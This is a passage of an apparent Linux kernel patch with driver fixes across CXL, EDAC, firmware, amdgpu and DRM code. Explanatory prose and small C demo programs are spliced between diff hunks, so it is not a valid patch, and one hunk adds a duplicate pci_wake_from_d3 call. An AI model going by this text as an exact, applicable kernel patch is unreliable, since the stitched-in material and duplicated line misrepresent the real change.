+ 	write_seqlock(&cxlsd->target_lock);
+-	for (i = 0; i < cxlsd->nr_targets; i++) {
++	for (i = 0; i < cxlsd->cxld.interleave_ways; i++) {
+ 		struct cxl_dport *dport = find_dport(port, target_map[i]);
+ 
+ 		if (!dport) {
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index ebc1b028555ca..2f7187dbfa2d9 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -331,7 +331,7 @@ static ssize_t interleave_ways_store(struct device *dev,
+ 		return rc;
+ 
+ 	/*
+-	 * Even for x3, x9, and x12 interleaves the region interleave must be a
++	 * Even for x3, x6, and x12 interleaves the region interleave must be a
+ 	 * power of 2 multiple of the host bridge interleave.
+ 	 */
+ 	if (!is_power_of_2(val / cxld->interleave_ways) ||
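
The corrected comment in region.c can be checked directly: the region interleave must be the host-bridge interleave times a power of two, so a 3-way bridge interleave can grow to 6 or 12 ways but never 9. A small sketch:

#include <stdio.h>
#include <stdbool.h>

static bool is_power_of_2(unsigned int n)
{
	return n && !(n & (n - 1));
}

/* Region interleave must be a power-of-2 multiple of the host bridge
 * interleave: 3 -> 6 -> 12 is fine (x2 each step), 3 -> 9 is not. */
static bool valid_region_ways(unsigned int region, unsigned int bridge)
{
	return region % bridge == 0 && is_power_of_2(region / bridge);
}

int main(void)
{
	printf("3 -> 6:  %d\n", valid_region_ways(6, 3));  /* 1: x2 */
	printf("3 -> 12: %d\n", valid_region_ways(12, 3)); /* 1: x4 */
	printf("3 -> 9:  %d\n", valid_region_ways(9, 3));  /* 0: x3 */
	return 0;
}
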
+diff --git a/drivers/edac/thunderx_edac.c b/drivers/edac/thunderx_edac.c
+index f13674081cb6b..4dca21b39bf73 100644
+--- a/drivers/edac/thunderx_edac.c
++++ b/drivers/edac/thunderx_edac.c
+@@ -1133,7 +1133,7 @@ static irqreturn_t thunderx_ocx_com_threaded_isr(int irq, void *irq_id)
+ 		decode_register(other, OCX_OTHER_SIZE,
+ 				ocx_com_errors, ctx->reg_com_int);
+ 
+-		strncat(msg, other, OCX_MESSAGE_SIZE);
++		strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 		for (lane = 0; lane < OCX_RX_LANES; lane++)
+ 			if (ctx->reg_com_int & BIT(lane)) {
+@@ -1142,12 +1142,12 @@ static irqreturn_t thunderx_ocx_com_threaded_isr(int irq, void *irq_id)
+ 					 lane, ctx->reg_lane_int[lane],
+ 					 lane, ctx->reg_lane_stat11[lane]);
+ 
+-				strncat(msg, other, OCX_MESSAGE_SIZE);
++				strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 				decode_register(other, OCX_OTHER_SIZE,
+ 						ocx_lane_errors,
+ 						ctx->reg_lane_int[lane]);
+-				strncat(msg, other, OCX_MESSAGE_SIZE);
++				strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 			}
+ 
+ 		if (ctx->reg_com_int & OCX_COM_INT_CE)
+@@ -1217,7 +1217,7 @@ static irqreturn_t thunderx_ocx_lnk_threaded_isr(int irq, void *irq_id)
+ 		decode_register(other, OCX_OTHER_SIZE,
+ 				ocx_com_link_errors, ctx->reg_com_link_int);
+ 
+-		strncat(msg, other, OCX_MESSAGE_SIZE);
++		strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 		if (ctx->reg_com_link_int & OCX_COM_LINK_INT_UE)
+ 			edac_device_handle_ue(ocx->edac_dev, 0, 0, msg);
+@@ -1896,7 +1896,7 @@ static irqreturn_t thunderx_l2c_threaded_isr(int irq, void *irq_id)
+ 
+ 		decode_register(other, L2C_OTHER_SIZE, l2_errors, ctx->reg_int);
+ 
+-		strncat(msg, other, L2C_MESSAGE_SIZE);
++		strlcat(msg, other, L2C_MESSAGE_SIZE);
+ 
+ 		if (ctx->reg_int & mask_ue)
+ 			edac_device_handle_ue(l2c->edac_dev, 0, 0, msg);
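
The thunderx_edac change swaps strncat() for strlcat() because strncat's size argument bounds the bytes appended, not the destination buffer -- passing the buffer size does not prevent overflow once the buffer is partly full. A demonstration with a local strlcat() (glibc only gained one in 2.38):

#include <stdio.h>
#include <string.h>

/* Local strlcat(): 'size' is the TOTAL destination buffer size. */
static size_t my_strlcat(char *dst, const char *src, size_t size)
{
	size_t dlen = strnlen(dst, size);
	size_t slen = strlen(src);

	if (dlen == size)
		return size + slen;
	if (slen >= size - dlen)
		slen = size - dlen - 1;
	memcpy(dst + dlen, src, slen);
	dst[dlen + slen] = '\0';
	return dlen + strlen(src);
}

int main(void)
{
	char msg[16] = "err:";

	/* strncat(msg, other, sizeof(msg)) may append sizeof(msg) bytes on
	 * top of what msg already holds; strlcat bounds the total length. */
	my_strlcat(msg, " lane0 timeout and more text", sizeof(msg));
	printf("\"%s\" (len %zu, cap %zu)\n", msg, strlen(msg), sizeof(msg));
	return 0;
}
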
+diff --git a/drivers/firmware/meson/meson_sm.c b/drivers/firmware/meson/meson_sm.c
+index d081a6312627b..bf19dd66c2137 100644
+--- a/drivers/firmware/meson/meson_sm.c
++++ b/drivers/firmware/meson/meson_sm.c
+@@ -313,11 +313,14 @@ static int __init meson_sm_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, fw);
+ 
+-	pr_info("secure-monitor enabled\n");
++	if (devm_of_platform_populate(dev))
++		goto out_in_base;
+ 
+ 	if (sysfs_create_group(&pdev->dev.kobj, &meson_sm_sysfs_attr_group))
+ 		goto out_in_base;
+ 
++	pr_info("secure-monitor enabled\n");
++
+ 	return 0;
+ 
+ out_in_base:
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 597d1a367d96d..6231c98ba291a 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -161,7 +161,7 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct resource *res;
+-	char debug_name[50] = "ti_sci_debug@";
++	char debug_name[50];
+ 
+ 	/* Debug region is optional */
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM,
+@@ -178,10 +178,10 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ 	/* Setup NULL termination */
+ 	info->debug_buffer[info->debug_region_size] = 0;
+ 
+-	info->d = debugfs_create_file(strncat(debug_name, dev_name(dev),
+-					      sizeof(debug_name) -
+-					      sizeof("ti_sci_debug@")),
+-				      0444, NULL, info, &ti_sci_debug_fops);
++	snprintf(debug_name, sizeof(debug_name), "ti_sci_debug@%s",
++		 dev_name(dev));
++	info->d = debugfs_create_file(debug_name, 0444, NULL, info,
++				      &ti_sci_debug_fops);
+ 	if (IS_ERR(info->d))
+ 		return PTR_ERR(info->d);
+ 
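
The ti_sci change builds the debugfs name with snprintf() instead of strncat() size arithmetic. A short sketch; the device name string here is made up:

#include <stdio.h>

int main(void)
{
	char debug_name[50];

	/* snprintf() never writes past the buffer and always terminates,
	 * so there is no strncat()-style size bookkeeping to get wrong. */
	snprintf(debug_name, sizeof(debug_name), "ti_sci_debug@%s",
		 "2b1f0000.system-controller");
	printf("%s\n", debug_name);
	return 0;
}
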
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index 8123feb1a1161..06ab6066da61a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -596,7 +596,7 @@ static ssize_t amdgpu_debugfs_regs_smc_read(struct file *f, char __user *buf,
+ 	int r;
+ 
+ 	if (!adev->smc_rreg)
+-		return -EPERM;
++		return -EOPNOTSUPP;
+ 
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+@@ -655,7 +655,7 @@ static ssize_t amdgpu_debugfs_regs_smc_write(struct file *f, const char __user *
+ 	int r;
+ 
+ 	if (!adev->smc_wreg)
+-		return -EPERM;
++		return -EOPNOTSUPP;
+ 
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b9983ca99eb7d..a8e1f2cfe12dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2202,6 +2202,8 @@ retry_init:
+ 
+ 		pci_wake_from_d3(pdev, TRUE);
+ 
++		pci_wake_from_d3(pdev, TRUE);
++
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 88bf6221d4bef..8a7705db0b9a6 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -1019,7 +1019,7 @@ int svm_migrate_init(struct amdgpu_device *adev)
+ 	} else {
+ 		res = devm_request_free_mem_region(adev->dev, &iomem_resource, size);
+ 		if (IS_ERR(res))
+-			return -ENOMEM;
++			return PTR_ERR(res);
+ 		pgmap->range.start = res->start;
+ 		pgmap->range.end = res->end;
+ 		pgmap->type = MEMORY_DEVICE_PRIVATE;
+@@ -1035,11 +1035,10 @@ int svm_migrate_init(struct amdgpu_device *adev)
+ 	r = devm_memremap_pages(adev->dev, pgmap);
+ 	if (IS_ERR(r)) {
+ 		pr_err("failed to register HMM device memory\n");
++		if (pgmap->type == MEMORY_DEVICE_PRIVATE)
++			devm_release_mem_region(adev->dev, res->start, resource_size(res));
+ 		/* Disable SVM support capability */
+ 		pgmap->type = 0;
+-		if (pgmap->type == MEMORY_DEVICE_PRIVATE)
+-			devm_release_mem_region(adev->dev, res->start,
+-						res->end - res->start + 1);
+ 		return PTR_ERR(r);
+ 	}
+ 
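
The kfd_migrate fix returns PTR_ERR(res) so callers see the real reason devm_request_free_mem_region() failed rather than a blanket -ENOMEM. A userspace re-creation of the kernel's ERR_PTR convention showing why that works:

#include <stdio.h>
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>

/* Re-creation of the kernel's ERR_PTR convention: encode a negative
 * errno in an invalid pointer value instead of returning NULL. */
#define MAX_ERRNO 4095

static void *ERR_PTR(long err) { return (void *)err; }
static long PTR_ERR(const void *p) { return (long)p; }
static bool IS_ERR(const void *p)
{
	return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO;
}

static void *request_region(int fail)
{
	static int region;

	if (fail)
		return ERR_PTR(-EBUSY); /* the real cause, not -ENOMEM */
	return &region;
}

int main(void)
{
	void *res = request_region(1);

	if (IS_ERR(res)) {
		/* propagate the actual error code, as the kfd fix does */
		printf("request failed: %ld\n", PTR_ERR(res));
		return (int)-PTR_ERR(res);
	}
	return 0;
}
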
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 713f893d25302..705d9e91b5aa3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -1403,10 +1403,11 @@ static int kfd_create_indirect_link_prop(struct kfd_topology_device *kdev, int g
+ 		num_cpu++;
+ 	}
+ 
++	if (list_empty(&kdev->io_link_props))
++		return -ENODATA;
++
+ 	gpu_link = list_first_entry(&kdev->io_link_props,
+-					struct kfd_iolink_properties, list);
+-	if (!gpu_link)
+-		return -ENOMEM;
++				    struct kfd_iolink_properties, list);
+ 
+ 	for (i = 0; i < num_cpu; i++) {
+ 		/* CPU <--> GPU */
+@@ -1484,15 +1485,17 @@ static int kfd_add_peer_prop(struct kfd_topology_device *kdev,
+ 				peer->gpu->adev))
+ 		return ret;
+ 
++	if (list_empty(&kdev->io_link_props))
++		return -ENODATA;
++
+ 	iolink1 = list_first_entry(&kdev->io_link_props,
+-							struct kfd_iolink_properties, list);
+-	if (!iolink1)
+-		return -ENOMEM;
++				   struct kfd_iolink_properties, list);
++
++	if (list_empty(&peer->io_link_props))
++		return -ENODATA;
+ 
+ 	iolink2 = list_first_entry(&peer->io_link_props,
+-							struct kfd_iolink_properties, list);
+-	if (!iolink2)
+-		return -ENOMEM;
++				   struct kfd_iolink_properties, list);
+ 
+ 	props = kfd_alloc_struct(props);
+ 	if (!props)
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+index f5e08b60f66ef..d17bfa111aa74 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+@@ -2748,10 +2748,8 @@ static int kv_parse_power_table(struct amdgpu_device *adev)
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+ 		ps = kzalloc(sizeof(struct kv_ps), GFP_KERNEL);
+-		if (ps == NULL) {
+-			kfree(adev->pm.dpm.ps);
++		if (ps == NULL)
+ 			return -ENOMEM;
+-		}
+ 		adev->pm.dpm.ps[i].ps_priv = ps;
+ 		k = 0;
+ 		idx = (u8 *)&power_state->v2.clockInfoIndex[0];
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
+index d3fe149d84765..291223ea7ba7d 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
+@@ -272,10 +272,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddcDependencyOnSCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddc_dependency_on_sclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usVddciDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -283,10 +281,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddciDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddci_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usVddcDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -294,10 +290,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddcDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddc_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usMvddDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -305,10 +299,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usMvddDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.mvdd_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usMaxClockVoltageOnDCOffset) {
+ 			ATOM_PPLIB_Clock_Voltage_Limit_Table *clk_v =
+@@ -339,10 +331,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				kcalloc(psl->ucNumEntries,
+ 					sizeof(struct amdgpu_phase_shedding_limits_entry),
+ 					GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.phase_shedding_limits_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.phase_shedding_limits_table.entries)
+ 				return -ENOMEM;
+-			}
+ 
+ 			entry = &psl->entries[0];
+ 			for (i = 0; i < psl->ucNumEntries; i++) {
+@@ -383,10 +373,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ATOM_PPLIB_CAC_Leakage_Record *entry;
+ 			u32 size = cac_table->ucNumEntries * sizeof(struct amdgpu_cac_leakage_table);
+ 			adev->pm.dpm.dyn_state.cac_leakage_table.entries = kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.cac_leakage_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.cac_leakage_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			entry = &cac_table->entries[0];
+ 			for (i = 0; i < cac_table->ucNumEntries; i++) {
+ 				if (adev->pm.dpm.platform_caps & ATOM_PP_PLATFORM_CAP_EVV) {
+@@ -438,10 +426,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_vce_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -493,10 +479,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_uvd_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -525,10 +509,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -548,10 +530,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(ext_hdr->usPPMTableOffset));
+ 			adev->pm.dpm.dyn_state.ppm_table =
+ 				kzalloc(sizeof(struct amdgpu_ppm_table), GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.ppm_table) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.ppm_table)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.ppm_table->ppm_design = ppm->ucPpmDesign;
+ 			adev->pm.dpm.dyn_state.ppm_table->cpu_core_number =
+ 				le16_to_cpu(ppm->usCpuCoreNumber);
+@@ -583,10 +563,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -606,10 +584,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ATOM_PowerTune_Table *pt;
+ 			adev->pm.dpm.dyn_state.cac_tdp_table =
+ 				kzalloc(sizeof(struct amdgpu_cac_tdp_table), GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.cac_tdp_table) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.cac_tdp_table)
+ 				return -ENOMEM;
+-			}
+ 			if (rev > 0) {
+ 				ATOM_PPLIB_POWERTUNE_Table_V1 *ppt = (ATOM_PPLIB_POWERTUNE_Table_V1 *)
+ 					(mode_info->atom_context->bios + data_offset +
+@@ -645,10 +621,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ret = amdgpu_parse_clk_voltage_dep_table(
+ 					&adev->pm.dpm.dyn_state.vddgfx_dependency_on_sclk,
+ 					dep_table);
+-			if (ret) {
+-				kfree(adev->pm.dpm.dyn_state.vddgfx_dependency_on_sclk.entries);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index c89cfef7cafa1..dc0a6fba7050f 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -7379,10 +7379,9 @@ static int si_dpm_init(struct amdgpu_device *adev)
+ 		kcalloc(4,
+ 			sizeof(struct amdgpu_clock_voltage_dependency_entry),
+ 			GFP_KERNEL);
+-	if (!adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries) {
+-		amdgpu_free_extended_power_table(adev);
++	if (!adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries)
+ 		return -ENOMEM;
+-	}
++
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.count = 4;
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries[0].clk = 0;
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries[0].v = 0;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index a31a62a1ce0b2..5e9410117712c 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -2987,6 +2987,8 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 		result = smu7_get_evv_voltages(hwmgr);
+ 		if (result) {
+ 			pr_info("Get EVV Voltage Failed.  Abort Driver loading!\n");
++			kfree(hwmgr->backend);
++			hwmgr->backend = NULL;
+ 			return -EINVAL;
+ 		}
+ 	} else {
+@@ -3032,8 +3034,10 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	result = smu7_update_edc_leakage_table(hwmgr);
+-	if (result)
++	if (result) {
++		smu7_hwmgr_backend_fini(hwmgr);
+ 		return result;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
+index 946212a955981..5e3b8edcf7948 100644
+--- a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
++++ b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
+@@ -403,7 +403,8 @@ static int _cdns_mhdp_hdcp_disable(struct cdns_mhdp_device *mhdp)
+ 
+ static int _cdns_mhdp_hdcp_enable(struct cdns_mhdp_device *mhdp, u8 content_type)
+ {
+-	int ret, tries = 3;
++	int ret = -EINVAL;
++	int tries = 3;
+ 	u32 i;
+ 
+ 	for (i = 0; i < tries; i++) {
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 7ef78283e3d3e..926ab5c3c31ab 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -2097,7 +2097,7 @@ static int tc_probe(struct i2c_client *client, const struct i2c_device_id *id)
+ 	} else {
+ 		if (tc->hpd_pin < 0 || tc->hpd_pin > 1) {
+ 			dev_err(dev, "failed to parse HPD number\n");
+-			return ret;
++			return -EINVAL;
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-tpd12s015.c b/drivers/gpu/drm/bridge/ti-tpd12s015.c
+index e0e015243a602..b588fea12502d 100644
+--- a/drivers/gpu/drm/bridge/ti-tpd12s015.c
++++ b/drivers/gpu/drm/bridge/ti-tpd12s015.c
+@@ -179,7 +179,7 @@ static int tpd12s015_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int __exit tpd12s015_remove(struct platform_device *pdev)
++static int tpd12s015_remove(struct platform_device *pdev)
+ {
+ 	struct tpd12s015_device *tpd = platform_get_drvdata(pdev);
+ 
+@@ -197,7 +197,7 @@ MODULE_DEVICE_TABLE(of, tpd12s015_of_match);
+ 
+ static struct platform_driver tpd12s015_driver = {
+ 	.probe	= tpd12s015_probe,
+-	.remove	= __exit_p(tpd12s015_remove),
++	.remove = tpd12s015_remove,
+ 	.driver	= {
+ 		.name	= "tpd12s015",
+ 		.of_match_table = tpd12s015_of_match,
+diff --git a/drivers/gpu/drm/drm_drv.c b/drivers/gpu/drm/drm_drv.c
+index 203bf8d6c34c4..d41a5eaa3e892 100644
+--- a/drivers/gpu/drm/drm_drv.c
++++ b/drivers/gpu/drm/drm_drv.c
+@@ -895,8 +895,11 @@ int drm_dev_register(struct drm_device *dev, unsigned long flags)
+ 			goto err_minors;
+ 	}
+ 
+-	if (drm_core_check_feature(dev, DRIVER_MODESET))
+-		drm_modeset_register_all(dev);
++	if (drm_core_check_feature(dev, DRIVER_MODESET)) {
++		ret = drm_modeset_register_all(dev);
++		if (ret)
++			goto err_unload;
++	}
+ 
+ 	DRM_INFO("Initialized %s %d.%d.%d %s for %s on minor %d\n",
+ 		 driver->name, driver->major, driver->minor,
+@@ -906,6 +909,9 @@ int drm_dev_register(struct drm_device *dev, unsigned long flags)
+ 
+ 	goto out_unlock;
+ 
++err_unload:
++	if (dev->driver->unload)
++		dev->driver->unload(dev);
+ err_minors:
+ 	remove_compat_control_link(dev);
+ 	drm_minor_unregister(dev, DRM_MINOR_PRIMARY);
+diff --git a/drivers/gpu/drm/mediatek/mtk_disp_merge.c b/drivers/gpu/drm/mediatek/mtk_disp_merge.c
+index 6428b6203ffe8..211140e87568d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_disp_merge.c
++++ b/drivers/gpu/drm/mediatek/mtk_disp_merge.c
+@@ -104,7 +104,7 @@ void mtk_merge_stop_cmdq(struct device *dev, struct cmdq_pkt *cmdq_pkt)
+ 	mtk_ddp_write(cmdq_pkt, 0, &priv->cmdq_reg, priv->regs,
+ 		      DISP_REG_MERGE_CTRL);
+ 
+-	if (priv->async_clk)
++	if (!cmdq_pkt && priv->async_clk)
+ 		reset_control_reset(priv->reset_ctl);
+ }
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 2c850b6d945bc..519e23a2a017c 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -2669,3 +2669,4 @@ MODULE_AUTHOR("Markus Schneider-Pargmann <msp@baylibre.com>");
+ MODULE_AUTHOR("Bo-Chen Chen <rex-bc.chen@mediatek.com>");
+ MODULE_DESCRIPTION("MediaTek DisplayPort Driver");
+ MODULE_LICENSE("GPL");
++MODULE_SOFTDEP("pre: phy_mtk_dp");
+diff --git a/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c b/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
+index eecfa98ff52e8..b288bb6eeecc7 100644
+--- a/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
++++ b/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
+@@ -223,8 +223,7 @@ int mtk_mdp_rdma_clk_enable(struct device *dev)
+ {
+ 	struct mtk_mdp_rdma *rdma = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(rdma->clk);
+-	return 0;
++	return clk_prepare_enable(rdma->clk);
+ }
+ 
+ void mtk_mdp_rdma_clk_disable(struct device *dev)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 6c0ffe8e4adbd..5a5821e59dc15 100644
